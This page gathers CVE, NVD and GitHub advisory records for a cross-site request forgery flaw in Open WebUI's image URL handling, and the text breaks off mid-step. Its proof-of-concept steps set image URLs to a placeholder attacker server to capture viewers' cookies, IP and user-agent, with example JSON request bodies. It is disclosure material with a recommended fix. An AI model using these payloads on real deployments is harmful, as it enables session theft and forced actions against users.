CVE-2026-45317 (GCVE-0-2026-45317)
Vulnerability from cvelistv5 – Published: 2026-05-15 21:29 – Updated: 2026-05-18 12:47| URL | Tags |
|---|---|
| https://github.com/open-webui/open-webui/security… | x_refsource_CONFIRM |
| Vendor | Product | Version | |
|---|---|---|---|
| open-webui | open-webui |
Affected:
< 0.9.3
|
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-45317",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-18T12:47:40.586844Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-05-18T12:47:43.603Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-j6w6-986j-2m2m"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "open-webui",
"vendor": "open-webui",
"versions": [
{
"status": "affected",
"version": "\u003c 0.9.3"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.3, an application-wide Cross-Site Request Forgery (CSRF) vulnerability was found Open-WebUl\u0027s image uploading functionality. An attacker can set an image URL to a malicious endpoint, allowing them to perform actions on behalf of a victim user. Any authenticated user can exploit this vulnerability, and any user who views the compromised image (e.g., a profile picture) will unknowingly send a GET request to the attacker-controlled URL. This can lead to cookie theft, denial of service (DoS), or other malicious actions. This vulnerability is fixed in 0.9.3."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 4.6,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:L",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-20",
"description": "CWE-20: Improper Input Validation",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-352",
"description": "CWE-352: Cross-Site Request Forgery (CSRF)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-15T21:29:44.870Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/open-webui/open-webui/security/advisories/GHSA-j6w6-986j-2m2m",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-j6w6-986j-2m2m"
}
],
"source": {
"advisory": "GHSA-j6w6-986j-2m2m",
"discovery": "UNKNOWN"
},
"title": "Open WebUI: Cross-Site Request Forgery (CSRF) via Image URL Manipulation"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-45317",
"datePublished": "2026-05-15T21:29:44.870Z",
"dateReserved": "2026-05-11T20:50:30.539Z",
"dateUpdated": "2026-05-18T12:47:43.603Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2026-45317",
"date": "2026-05-24",
"epss": "6e-05",
"percentile": "0.00459"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2026-45317\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-15T22:16:54.520\",\"lastModified\":\"2026-05-18T20:12:20.727\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.3, an application-wide Cross-Site Request Forgery (CSRF) vulnerability was found Open-WebUl\u0027s image uploading functionality. An attacker can set an image URL to a malicious endpoint, allowing them to perform actions on behalf of a victim user. Any authenticated user can exploit this vulnerability, and any user who views the compromised image (e.g., a profile picture) will unknowingly send a GET request to the attacker-controlled URL. This can lead to cookie theft, denial of service (DoS), or other malicious actions. This vulnerability is fixed in 0.9.3.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:L\",\"baseScore\":4.6,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"REQUIRED\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"LOW\"},\"exploitabilityScore\":2.1,\"impactScore\":2.5}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-20\"},{\"lang\":\"en\",\"value\":\"CWE-352\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:openwebui:open_webui:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"0.9.3\",\"matchCriteriaId\":\"289624DF-DC93-4E9F-9D2C-502D95BAF58A\"}]}]}],\"references\":[{\"url\":\"https://github.com/open-webui/open-webui/security/advisories/GHSA-j6w6-986j-2m2m\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/open-webui/open-webui/security/advisories/GHSA-j6w6-986j-2m2m\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-45317\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-05-18T12:47:40.586844Z\"}}}], \"references\": [{\"url\": \"https://github.com/open-webui/open-webui/security/advisories/GHSA-j6w6-986j-2m2m\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-05-18T12:47:36.277Z\"}}], \"cna\": {\"title\": \"Open WebUI: Cross-Site Request Forgery (CSRF) via Image URL Manipulation\", \"source\": {\"advisory\": \"GHSA-j6w6-986j-2m2m\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 4.6, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:L\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"REQUIRED\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"LOW\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"LOW\"}}], \"affected\": [{\"vendor\": \"open-webui\", \"product\": \"open-webui\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 0.9.3\"}]}], \"references\": [{\"url\": \"https://github.com/open-webui/open-webui/security/advisories/GHSA-j6w6-986j-2m2m\", \"name\": \"https://github.com/open-webui/open-webui/security/advisories/GHSA-j6w6-986j-2m2m\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.3, an application-wide Cross-Site Request Forgery (CSRF) vulnerability was found Open-WebUl\u0027s image uploading functionality. An attacker can set an image URL to a malicious endpoint, allowing them to perform actions on behalf of a victim user. Any authenticated user can exploit this vulnerability, and any user who views the compromised image (e.g., a profile picture) will unknowingly send a GET request to the attacker-controlled URL. This can lead to cookie theft, denial of service (DoS), or other malicious actions. This vulnerability is fixed in 0.9.3.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-20\", \"description\": \"CWE-20: Improper Input Validation\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-352\", \"description\": \"CWE-352: Cross-Site Request Forgery (CSRF)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-05-15T21:29:44.870Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-45317\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-05-18T12:47:43.603Z\", \"dateReserved\": \"2026-05-11T20:50:30.539Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-05-15T21:29:44.870Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
FKIE_CVE-2026-45317
Vulnerability from fkie_nvd - Published: 2026-05-15 22:16 - Updated: 2026-05-18 20:12| URL | Tags | ||
|---|---|---|---|
| security-advisories@github.com | https://github.com/open-webui/open-webui/security/advisories/GHSA-j6w6-986j-2m2m | Exploit, Mitigation, Vendor Advisory | |
| 134c704f-9b21-4f2e-91b3-4a467353bcc0 | https://github.com/open-webui/open-webui/security/advisories/GHSA-j6w6-986j-2m2m | Exploit, Mitigation, Vendor Advisory |
| Vendor | Product | Version | |
|---|---|---|---|
| openwebui | open_webui | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openwebui:open_webui:*:*:*:*:*:*:*:*",
"matchCriteriaId": "289624DF-DC93-4E9F-9D2C-502D95BAF58A",
"versionEndExcluding": "0.9.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.3, an application-wide Cross-Site Request Forgery (CSRF) vulnerability was found Open-WebUl\u0027s image uploading functionality. An attacker can set an image URL to a malicious endpoint, allowing them to perform actions on behalf of a victim user. Any authenticated user can exploit this vulnerability, and any user who views the compromised image (e.g., a profile picture) will unknowingly send a GET request to the attacker-controlled URL. This can lead to cookie theft, denial of service (DoS), or other malicious actions. This vulnerability is fixed in 0.9.3."
}
],
"id": "CVE-2026-45317",
"lastModified": "2026-05-18T20:12:20.727",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 4.6,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.1,
"impactScore": 2.5,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2026-05-15T22:16:54.520",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Mitigation",
"Vendor Advisory"
],
"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-j6w6-986j-2m2m"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"tags": [
"Exploit",
"Mitigation",
"Vendor Advisory"
],
"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-j6w6-986j-2m2m"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-20"
},
{
"lang": "en",
"value": "CWE-352"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
GHSA-J6W6-986J-2M2M
Vulnerability from github – Published: 2026-05-14 20:18 – Updated: 2026-05-19 15:58Summary
An application-wide Cross-Site Request Forgery (CSRF) vulnerability was found Open-WebUl's image uploading functionality. An attacker can set an image URL to a malicious endpoint, allowing them to perform actions on behalf of a victim user. Any authenticated user can exploit this vulnerability, and any user who views the compromised image (e.g., a profile picture) will unknowingly send a GET request to the attacker-controlled URL. This can lead to cookie theft, denial of service (DoS), or other malicious actions.
This can be exploited in various locations, including:
• Profile picture
• Model picture
• Hidden images in shared chats
• Images within shared notes
Details
Vulnerable Code:
This appears to occur in most locations where images can be uploaded/rendered. Here are found sinks:
Profile Image in chat
• Note: rendering profile picture in chat
• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/chat/Messages/ProfileImage.svelte#L16Code
Profile Picture edit
• Note: Profile picture rendering in edit
• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/chat/Settings/Account.svelte#L205
Profile Image Navbar
• Note: Profile picture rendering in navbar
• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/chat/Navbar.svelte#L237
Profile Image UserList
• Note: rendering images in user list admin panel
• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/admin/Users/UserList.svelte#L399
Images in chat
• Note: rendering images in chat
• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/common/Image.svelte#L35
Image in chat
• Note: Image sent in chat
• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/channel/Messages/Message.svelte#L192 Model image in chat
• Note: Model image rendering in chat
• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/chat/Placeholder.svelte#L128
Model image in chat response
• Note: Model image rendering in the assistant response
• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/chat/Messages/ResponseMessage.svelte#L612
Model Image Admin settings
• Note: Model image rendering in the admin settings
• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/admin/Settings/Models.svelte#L336
Model Image Workspace
• Note: Model image rendering in the workspace
• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/workspace/Models.svelte#L336
Model Image Edit
• Note: Model image rendering in the edit modal
• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/workspace/Models/ModelEditor.svelte#L407
Image in Notes
• Note: Image rendering in shared note
• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/common/RichTextInput/Image/image.ts#L140
• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/chat/Messages/UserMessage.svelte#L184
Root Cause
- Insecure display of image
• Application is sending a GET request to the unvalidated image url
- Lack of Input Validation
• Image url is not validated for filetype
PoCs
PoC (profile picture)
Environment
• Open-WebUl latest version (v0.6.41)
• Valid user
Step 1: Create a Malicious Link
• Set up a server to obtain victim's cookies, ip, referer, user-agent, etc
Step 2: Profile Image URL
-
Add user
-
Change the profile image url parameter to the malicious URL (server was used for PoC)
-
Example POST request:
-
Repeat action
- Repeat for userSignUp, updateUserProfile, and update
Step 3: View Image on Victim Admin Account
-
Log into an admin account
-
Visit the admin panel (/admin/users/overview)
-
Notice the GET request sent to the malicious URL
Step 4: Verify User Information Is Sent
- Confirm user information is sent
PoC (chat)
Environment
• Open-WebUl latest version (v0.6.41)
• Valid user
Step 1: Create a Malicious Link
• Set up a server to obtain victim's cookies, ip, referer, use-agent, etc
Step 2: Start chat
-
Start chat
-
Send a message
-
Resend POST request
-
Resend post request to this endpoint /api/v1/chats/[chat_id_here]
-
Add in a file with type set to image and the url set to the malicious link
-
Replace models/ids/malicious_url_here with what is applicable
-
{"chat":{"models":["redacted"],"history":{"messages":{"id_here":{"id":"id_here","parentId":"id_here","childrenIds":["id_here"],"role":"user","content":"","files":[{"type":"image","url":"MALICIOUS_URL_HERE"}],"timestamp":1765978991,"models":["redacted"]}}},"params":{},"files":[]}}
-
Share chat
- Copy link to share the chat
Step 3: View Image on Victim Account
-
Log into a valid account
-
Open the shared chat
-
Notice the GET request sent to the malicious URL from the hidden image on the page
Step 4: Verify User Information Is Sent
- Confirm user information is sent
PoC (notes)
Environment
• Open WebUI latest version (v0.6.41)
• Valid user with access to notes
Step 1: Create a Malicious Link
• Set up a server to obtain victim's cookies, ip, referer, use-agent, etc
Step 2: Create Note
-
Resend POST request to /api/v1/notes/[note_id_here]/update
-
Add in the malicious URL to a file
-
Example parameters
1. (replace the ID_HERE with valid ID and MALICIOUS_URL_HERE with the malicious URL):
{"title":"2025-12-17","data":{"files":[{"id":"ID_HERE","type":"image","url":"MALICIOUS_URL_HERE"}]},"access_control":{"read":{"group_ids":[],"user_ids":[]},"write":{"group_ids":[],"user_ids":[]}}}
-
Refresh page and notice the request being sent to the malicious URL
-
Share note and copy link
Step 5: View Note on Valid Account
-
Log into a valid account
-
Open the shared note
-
Notice the GET request sent to the malicious URL from the hidden image on the page
Step 6: Verify User Information Is Sent
- Verify that user information is sent.
PoC (model)
Environment
• Open WebUI latest version (v0.6.41)
• Admin user
Step 1: Create a Malicious Link
• Set up a server to obtain victim's cookies, ip, referer, use-agent, etc
Step 2: Create Model
-
Navigate to /workspace/models
-
Create or edit a model
-
Send a POST request to /api/v1/models/create or /api/v1/models/model/update?id=[model_id]
-
Change the profile_image_url to the malicious link
-
Example parameters:
-
{"id":"model_test","base_model_id":"redacted","name":"MODEL_TEST","meta":{"profile_image_url":"MALICIOUS_URL_HERE","description":null,"suggestion_prompts":null,"tags":[],"capabilities":{"vision":true,"file_upload":true,"web_search":true,"image_generation":true,"code_interpreter":true,"citations":true,"usage":false}},"params":{},"access_control":null}
Step 3: View Image on Valid Account
-
Log into a valid account
-
Create chat with the model
-
Notice a GET request is sent to the malicious url
-
All users starting a chat with that model will be vulnerable to the attack
Step 4: View Image on Admin Account
-
Navigate to /workspace/models
-
Notice GET request sent to malicious url
Step 5: Verify User Information Is Sent
- On the set up server verify that improperly set cookies are sent, IP, user-agent, etc.
Other Attack Examples
-
Alternative malicious links
-
Signout of Open WebUI
- /api/v1/auths/signout
-
Internal network endpoints
-
Signout of other applications
-
Resource intensive endpoints
-
Etc
Recommended Fix
-
Store images
-
Instead of sending a GET request to load the image each time, store the image and render on the page
-
Validate input
-
Image file types should be whitelisted (examples: .jpg, .png, .gif, .jpeg, etc)
Impact
Vulnerability Type
-
CWE-352: Cross-Site Request Forgery (CSRF)
-
CWE-20: Improper Input Validation
Affected users
- All authenticated users
The impact of this vulnerability is significant. This application-wide vulnerability allows an attacker to perform actions on behalf of any user who views the compromised image. This can be particularly damaging if an administrator or privileged user views the image, as it could lead to elevated access or sensitive data exposure.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.9.2"
},
"package": {
"ecosystem": "PyPI",
"name": "open-webui"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.9.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-45317"
],
"database_specific": {
"cwe_ids": [
"CWE-20",
"CWE-352"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-14T20:18:42Z",
"nvd_published_at": "2026-05-15T22:16:54Z",
"severity": "MODERATE"
},
"details": "## Summary\n\nAn application-wide Cross-Site Request Forgery (CSRF)\u00a0vulnerability was found Open-WebUl\u0027s image uploading functionality. An attacker can set an image URL to a malicious endpoint, allowing them to perform actions on behalf of a victim user. Any authenticated user can exploit this vulnerability, and any user who views the compromised image (e.g., a profile picture) will unknowingly send a GET request to the attacker-controlled URL. This can lead to cookie theft, denial of service (DoS), or other malicious actions.\n\n\n\nThis can be exploited in various locations, including:\n\n\u2022 Profile picture\n\n\u2022 Model picture\n\n\u2022 Hidden images in shared chats\n\n\u2022 Images within shared notes\n\n## Details\n\n### Vulnerable Code:\nThis appears to occur in most locations where images can be uploaded/rendered. Here are found sinks:\n\n**Profile Image in chat**\n\n\u2022 Note: rendering profile picture in chat\n\n\u2022 Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/chat/Messages/ProfileImage.svelte#L16Code\n\n**Profile Picture edit**\n\n\u2022 Note: Profile picture rendering in edit\n\n\u2022 Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/chat/Settings/Account.svelte#L205\n\n**Profile Image Navbar**\n\n\u2022 Note: Profile picture rendering in navbar\n\n\u2022 Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/chat/Navbar.svelte#L237\n\n**Profile Image UserList**\n\n\u2022 Note: rendering images in user list admin panel\n\n\u2022 Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/admin/Users/UserList.svelte#L399\n\n**Images in chat**\n\n\u2022 Note: rendering images in chat\n\n\u2022 Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/common/Image.svelte#L35\n\n**Image in chat**\n\n\u2022 Note: Image sent in chat\n\n\u2022 Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/channel/Messages/Message.svelte#L192\n**Model image in chat**\n\n\u2022 Note: Model image rendering in chat\n\n\u2022 Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/chat/Placeholder.svelte#L128\n\n**Model image in chat response**\n\n\u2022 Note: Model image rendering in the assistant response\n\n\u2022 Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/chat/Messages/ResponseMessage.svelte#L612\n\n**Model Image Admin settings**\n\n\u2022 Note: Model image rendering in the admin settings\n\n\u2022 Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/admin/Settings/Models.svelte#L336\n\n**Model Image Workspace**\n\n\u2022 Note: Model image rendering in the workspace\n\n\u2022 Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/workspace/Models.svelte#L336\n\n**Model Image Edit**\n\n\u2022 Note: Model image rendering in the edit modal\n\n\u2022 Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/workspace/Models/ModelEditor.svelte#L407\n\n**Image in Notes**\n\n\u2022 Note: Image rendering in shared note\n\n\u2022 Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/common/RichTextInput/Image/image.ts#L140\n\n\u2022 Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/chat/Messages/UserMessage.svelte#L184\n\n**Root Cause**\n\n1. Insecure display of image\n\n\u2022 Application is sending a GET request to the unvalidated image url\n\n2. Lack of Input Validation\n\n\u2022 Image url is not validated for filetype\n\n\n\n## PoCs\n\n### PoC (profile picture)\n\n**Environment**\n\n\u2022 Open-WebUl latest version (v0.6.41)\n\n\u2022 Valid user\n\n**Step 1: Create a Malicious Link**\n\n\u2022 Set up a server to obtain victim\u0027s cookies, ip, referer, user-agent, etc\n\n**Step 2: Profile Image URL**\n\n1. Add user\n\n1. Change the profile image url parameter to the malicious URL (server was used for PoC)\n\n2. Example POST request:\n\n\u003cimg width=\"1245\" height=\"484\" alt=\"image\" src=\"https://github.com/user-attachments/assets/295f0ab0-fe41-4d50-9c38-cb8c51a3bca2\" /\u003e\n\n\n4. Repeat action\n\n 1. Repeat for userSignUp, updateUserProfile, and update\n\n**Step 3: View Image on Victim Admin Account**\n\n1. Log into an admin account\n\n2. Visit the admin panel (/admin/users/overview)\n\n3. Notice the GET request sent to the malicious URL\n\n**Step 4: Verify User Information Is Sent**\n\n1. Confirm user information is sent\n\n\u003cimg width=\"1280\" height=\"677\" alt=\"image\" src=\"https://github.com/user-attachments/assets/cb2f4039-167f-43f4-bd37-ffaf4d476cee\" /\u003e\n\n\n### PoC (chat)\n\n**Environment**\n\n\u2022 Open-WebUl latest version (v0.6.41)\n\n\u2022 Valid user\n\n**Step 1: Create a Malicious Link**\n\n\u2022 Set up a server to obtain victim\u0027s cookies, ip, referer, use-agent, etc\n\n**Step 2: Start chat**\n\n1. Start chat\n\n1. Send a message\n\n2. Resend POST request\n\n1. Resend post request to this endpoint /api/v1/chats/[chat_id_here]\n\n2. Add in a file with type set to image and the url set to the malicious link\n\n3. Replace models/ids/malicious_url_here with what is applicable\n\n4. {\"chat\":{\"models\":[\"redacted\"],\"history\":{\"messages\":{\"id_here\":{\"id\":\"id_here\",\"parentId\":\"id_here\",\"childrenIds\":[\"id_here\"],\"role\":\"user\",\"content\":\"\",\"files\":[{\"type\":\"image\",\"url\":\"MALICIOUS_URL_HERE\"}],\"timestamp\":1765978991,\"models\":[\"redacted\"]}}},\"params\":{},\"files\":[]}}\n\n\u003cimg width=\"646\" height=\"593\" alt=\"image\" src=\"https://github.com/user-attachments/assets/1273fe2b-3b3b-45dc-9c52-6811f7b18667\" /\u003e\n\n3. Share chat\n\n 1. Copy link to share the chat\n\n**Step 3: View Image on Victim Account**\n\n1. Log into a valid account\n\n2. Open the shared chat\n\n3. Notice the GET request sent to the malicious URL from the hidden image on the page\n\n\u003cimg width=\"1384\" height=\"500\" alt=\"image\" src=\"https://github.com/user-attachments/assets/bd6e220d-e039-4916-9865-5ce9f0939951\" /\u003e\n\n\n**Step 4: Verify User Information Is Sent**\n\n1. Confirm user information is sent\n\n\u003cimg width=\"1480\" height=\"797\" alt=\"image\" src=\"https://github.com/user-attachments/assets/78374c2e-d9c6-476b-944d-1c8230398989\" /\u003e\n\n\n### PoC (notes)\n\n**Environment**\n\n\u2022 Open WebUI latest version (v0.6.41)\n\n\u2022 Valid user with access to notes\n\n**Step 1: Create a Malicious Link**\n\n\u2022 Set up a server to obtain victim\u0027s cookies, ip, referer, use-agent, etc\n\n**Step 2: Create Note**\n\n1. Resend POST request to /api/v1/notes/[note_id_here]/update\n\n2. Add in the malicious URL to a file\n\n3. Example parameters\n\n 1.\u00a0 (replace the ID_HERE with valid ID and MALICIOUS_URL_HERE with the malicious URL):\n\n 2. `{\"title\":\"2025-12-17\",\"data\":{\"files\":[{\"id\":\"ID_HERE\",\"type\":\"image\",\"url\":\"MALICIOUS_URL_HERE\"}]},\"access_control\":{\"read\":{\"group_ids\":[],\"user_ids\":[]},\"write\":{\"group_ids\":[],\"user_ids\":[]}}}`\n\n\u003cimg width=\"892\" height=\"662\" alt=\"image\" src=\"https://github.com/user-attachments/assets/325a9bfa-2fb3-45be-aeec-e5695085d7d0\" /\u003e\n\n4. Refresh page and notice the request being sent to the malicious URL\n\n5. Share note and copy link\n\n**Step 5: View Note on Valid Account**\n\n1. Log into a valid account\n\n2. Open the shared note\n\n3. Notice the GET request sent to the malicious URL from the hidden image on the page\n\n\u003cimg width=\"1597\" height=\"317\" alt=\"image\" src=\"https://github.com/user-attachments/assets/767d865b-04a0-42b9-82fc-122acb9cbf16\" /\u003e\n\n**Step 6: Verify User Information Is Sent**\n\n1. Verify that user information is sent.\n\n\u003cimg width=\"1997\" height=\"860\" alt=\"image\" src=\"https://github.com/user-attachments/assets/b0ecab88-9830-4fb4-ac18-acda9eb44ff7\" /\u003e\n\n### PoC (model)\n\n**Environment**\n\n\u2022 Open WebUI latest version (v0.6.41)\n\n\u2022 Admin user\n\n**Step 1: Create a Malicious Link**\n\n\u2022 Set up a server to obtain victim\u0027s cookies, ip, referer, use-agent, etc\n\n**Step 2: Create Model**\n\n1. Navigate to /workspace/models\n\n2. Create or edit a model\n\n3. Send a POST request to /api/v1/models/create or /api/v1/models/model/update?id=[model_id]\n\n1. Change the profile_image_url to the malicious link\n\n2. Example parameters:\n\n3. `{\"id\":\"model_test\",\"base_model_id\":\"redacted\",\"name\":\"MODEL_TEST\",\"meta\":{\"profile_image_url\":\"MALICIOUS_URL_HERE\",\"description\":null,\"suggestion_prompts\":null,\"tags\":[],\"capabilities\":{\"vision\":true,\"file_upload\":true,\"web_search\":true,\"image_generation\":true,\"code_interpreter\":true,\"citations\":true,\"usage\":false}},\"params\":{},\"access_control\":null}`\n\u003cimg width=\"887\" height=\"618\" alt=\"image\" src=\"https://github.com/user-attachments/assets/749dac39-0b9d-4b7e-815d-fd6f3f7c57bd\" /\u003e\n\n\n**Step 3: View Image on Valid Account**\n\n1. Log into a valid account\n\n2. Create chat with the model\n\n3. Notice a GET request is sent to the malicious url\n\n4. All users starting a chat with that model will be vulnerable to the attack\n\n\u003cimg width=\"1852\" height=\"468\" alt=\"image\" src=\"https://github.com/user-attachments/assets/ff69c0a2-326d-4b99-9d8c-a73d9aa0deff\" /\u003e\n\n\n**Step 4:\u00a0 View Image on Admin Account**\n\n1. Navigate to 